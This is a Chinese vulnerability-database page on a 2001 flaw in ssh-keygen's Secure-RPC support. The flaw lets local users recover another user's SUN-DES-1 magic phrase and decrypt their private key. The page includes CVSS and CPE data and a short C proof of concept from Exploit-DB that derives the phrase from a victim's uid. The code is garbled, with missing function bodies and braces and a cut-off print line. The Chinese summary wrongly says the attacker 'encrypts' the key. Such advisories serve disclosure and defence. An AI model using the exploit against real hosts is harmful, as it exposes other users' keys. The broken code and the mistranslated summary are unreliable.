发布时间 :2001-06-02 00:00:00
修订时间 :2017-10-09 21:29:39

[原文]ssh-keygen in ssh 1.2.27 - 1.2.30 with Secure-RPC can allow local attackers to recover a SUN-DES-1 magic phrase generated by another user, which the attacker can use to decrypt that user's private key file.


        带有Secure-RPC的ssh 1.2.27 - 1.2.30版本中ssh-keygen存在漏洞。本地攻击者利用该漏洞恢复另外一个用户产生的SUN-DES-1魔法短语,攻击者利用该漏洞加密用户的私人密钥文件。

- CVSS (基础分值)

CVSS分值: 3.6 [轻微(LOW)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:ssh:ssh:1.2.27SSH Communications Security SSH daemon 1.2.27
cpe:/a:ssh:ssh:1.2.28SSH Communications Security SSH daemon 1.2.28
cpe:/a:ssh:ssh:1.2.29SSH Communications Security SSH daemon 1.2.29
cpe:/a:ssh:ssh:1.2.30SSH Communications Security SSH daemon 1.2.30

- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(VENDOR_ADVISORY)  BUGTRAQ  20010116 Bug in SSH1 secure-RPC support can expose users' private keys
(UNKNOWN)  XF  ssh-rpc-private-key

- 漏洞信息

低危 未知
2001-06-02 00:00:00 2006-09-05 00:00:00
        带有Secure-RPC的ssh 1.2.27 - 1.2.30版本中ssh-keygen存在漏洞。本地攻击者利用该漏洞恢复另外一个用户产生的SUN-DES-1魔法短语,攻击者利用该漏洞加密用户的私人密钥文件。

- 公告与补丁


- 漏洞信息 (20560)

SSH 1.2.x Secure-RPC Weak Encrypted Authentication Vulnerability (EDBID:20560)
unix local
2001-01-16 Verified
0 Richard Silverman
N/A [点击下载]

SSH is a package designed to encrypt traffic between two end points using the IETF specified SSH protocol. The SSH1 package is distributed and maintained by SSH Communications Security.

A problem exists which could allow the discovery of the secret key used to encrypt traffic on the local host. When using SUN-DES-1 to share keys with other hosts on the network to facilitate secure communication via protocols such as NFS and NIS+, the keys are shared between hosts using the private key of the user and a cryptographic algorithm to secure the contents of the key, which is stored on the NIS+ primary. The problem occurs when the key is encrypted with the SUN-DES-1 magic phrase prior to having done a keylogin (the keyserv does not have the users DH private key). A design flaw in the software that shares the key with the NIS+ master will inconsistently return the correct value for an attempted keyshare that has failed. A step in the private key encryption process is skipped, and the users private key is then encrypted only with the public key of the target server and the SUN-DES-1 magic phrase, a phrase that is guessable due to the way it is generated. A user from the same host can then execute a function that returns another users magic phrase, and use this to decrypt the private key of the victim. This makes it possible for a user with malicious intent to gain knowledge of a users secret key, and decrypt sensitive traffic between two hosts, with the possibility of gaining access and elevated privileges on the hosts and/or NIS+ domain. This reportedly affects the SSH2 series of the software package. 

#include <stdio.h>
#include <rpc/rpc.h>

void die (char *msg)

main (int argc, char **argv)
  char buf[MAXNETNAMELEN + 1];
  des_block block;
  uid_t uid;
  char *netname;

  if (argc < 3)
    die("supply uid and netname");

  sscanf(argv[1], "%d", &uid);
  netname = argv[2];
  memset(buf, 0, sizeof(buf));
  snprintf(buf, sizeof(buf), "ssh.%04X", uid);
  memcpy(block.c, buf, sizeof(block.c));
  if (key_encryptsession(netname, &block) != 0)
    die("key_encryptsession failed");
  printf("SUN-DES-1 magic phrase (uid %d, netname %s):\n  %08X%08X\n",

- 漏洞信息

SSH ssh-keygen with Secure-RPC SUN-DES-1 Pass Phrase Recovery
Local Access Required Cryptographic
Loss of Confidentiality Patch / RCS
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2001-01-16 Unknow
2001-01-16 Unknow

- 解决方案


Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete